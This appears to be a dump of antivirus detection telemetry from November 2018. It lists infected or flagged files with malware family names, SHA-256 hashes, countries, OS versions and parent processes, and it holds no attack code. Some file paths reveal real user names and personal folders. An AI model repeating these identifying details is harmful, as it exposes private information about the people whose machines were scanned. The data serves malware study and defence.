  Row(detection=Row(filename='netreg.exe', filepath='D:\\Sürücüler\\Güvenlik Yazılımı\\Drive Vaccine PC Restore Plus\\program files\\Shield\\netreg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='db43f0d680f25aeb6aa829f09732c4697744516b181fd58476c10149f26e61da', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T12:53:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150130-9d92d41e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150130-9D92D41E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212056-d4cfa933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212056-D4CFA933', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093644-a5f85c5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093644-A5F85C5E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) USB 3.0 eXtensible Host Controller Driver\\uninstall\\Setup.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='e96a3dbfe25fa34212001fe9627835ddbfa56f19de26ac71e0be29fc9a19deb2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T22:30:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\0kpajx5iazx\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T08:22:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212242-e43e961c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212242-E43E961C', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lol.launcher.exe', filepath='e:\\league of legends\\lol.launcher.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='admin.exe', filepath='E:\\PENTA 14-09-2016\\admin.exe', filesize=6720000, name='W32/Almanahe.D.#M1.#R1'), hash='9f9c4216b3ab8471f0ffbdcd2556b8730d613cb1675bfa3271a287600294555f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ps2pdf995.exe', filepath='D:\\BKP HD\\Lixo 2\\Desktop 2015\\BKP Servidor\\Caio\\ps2pdf995.exe', filesize=8388000, name='W32/Neshta.A.#M1.#R1'), hash='9f0b2c81ae468ee620aea67b2d9be6f083ac61f939b01554bca3372a11acb3b1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:49:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152754-cd308ee8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152754-CD308EE8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:28:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151408-2ef166f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151408-2EF166F3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esercizi excel.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Esercizi Excel.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103435-13151e6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103435-13151E6B', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='griglie.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CARTA INTESTATA FALDONI\\GRIGLIE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-225409-065982ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201154-631B45A0\\AVSCAN-20181104-225409-065982AC', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:54:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131122-17d732e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131122-17D732E8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125900-a2c885f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0097e185\\AVSCAN-20181104-124304-2E29971A\\AVSCAN-20181104-125900-A2C885F5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211711-7b954e7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d441150e\\AVSCAN-20181104-211657-78DAD263\\AVSCAN-20181104-211711-7B954E7C', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:17:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:00:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9614400\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$908FA,11849392,56832,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\cheat-engine-6-7.exe\\\\\\" \\\\\\/SPAWNWND=$110CBC \\\\\\/NOTIFYWND=$470C9E ', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-43V5P.tmp\\cheat-engine-6-7.tmp', parentsize=723552, timestamp='2018-11-04T20:38:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195823-1a17b2bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-195823-1A17B2BB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:58:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='initwain.exe', filepath='C:\\Program Files (x86)\\Nuance\\PaperPort\\initwain.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3d53931f1402e34996fee1c43dc6424521d912037ec0ac0c37f24647c4212cd2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:rsUe4FcwdUKb06K7.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:23:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\1\\1\\2\\3\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T00:46:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='5e806c401507984bf3a5aedaf34d963b9678d27c9fc6c43ce8b26f5ccf7aa6e7', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2973184, timestamp='2018-11-04T09:30:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140329-f9563bf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140329-F9563BF0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5956039\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-04T20:01:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\NTServices\\mSiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:03:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162108-e7bde116', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162108-E7BDE116', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:21:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T21:20:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T12:49:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{KFXZ0-JL26N-GNAB3-44VHW-W6608-KHGY1}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-04T17:59:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125737-78888dc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_446839e4\\AVSCAN-20181104-125451-5F87FCA1\\AVSCAN-20181104-125737-78888DC4', filesize=768000, name='PUA/BitcoinMiner.#M1.#R1'), hash='59cb6d959917bc8e5c6b1fc9fd980cc21e351570df79cd2f942051c09aa9fb90', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:57:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201215-6d17ed89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201215-6D17ED89', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1c443d11.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1c443d11.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2066815.exe', filepath='C:\\Program Files (x86)\\Super\\2066815.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:37:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='csupdate.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\acad2014 32bits\\x86\\RC2014\\Program Files\\Autodesk\\Autodesk ReCap\\csupdate.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='1c5848b14bc8ebb210f05417a14347591e0dc3b600a10a1afa49ad049f05a020', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:27:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='synhel~1.exe', filepath='C:\\Users\\eZee\\AppData\\Roaming\\6B53D1~1\\SYNHEL~1.EXE', filesize=576000, name='HEUR/AGEN.1000187.#M1.#R1'), hash='a6ba2bfa2b6a1c219b3496827d3f19c296fa6d236ee6f15e9a9b438b1f751dc5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T06:16:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wgamecfg.exe', filepath='E:\\الــعـــاب 1\\الــعــاب بــيــت الــمــوت\\بــيــت الــمــوت 1\\WGAMECFG.EXE', filesize=64000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='52a2024f3695ba688d2340ea07e55eb2a5dc274af41d4e4dcbfcc49bb53f8231', metadata=Row(cmdline='rtp', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903696, timestamp='2018-11-04T19:54:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220111-ecab7156', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220111-ECAB7156', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:01:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:25:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5f6f5d50-e8bc-5286-97f4-78f15e802a73.exe', filepath='\\?\\F:\\{f6166e04-5b74-7686-234f-cfc6de3b0307}\\5f6f5d50-e8bc-5286-97f4-78f15e802a73.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='9d6d3b95598efbfde9027931f8c12f8aedfdf33a0e75cdca7b900b4e77dead91', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:14:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d3a5', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d3a5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Windows\\winsxs\\x86_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_6.1.7600.16385_none_1ad106c1a14e554e\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='56dc7cfbdceec53580626ebe40519699c3c88ab27ad9f82a93d974fa1a0ff56e', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ndp46-kb3045560-web.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045560-Web.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='b5f1fddc646129d18881165e61a34decbf12ac8274a756119958ca55f91f4c4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111512-d9581619', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a60bc76\\AVSCAN-20181104-105944-22245E46\\AVSCAN-20181104-111512-D9581619', filesize=1544000, name='PUA/InstallCore.#M1.#R1'), hash='21fecdb50061690e6b36b8c19e72a9dc7f59bc25ff5c3b2c5ff0203fc42665ea', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:15:15Z'), dt=datetime.date(2018, 11, 4)),
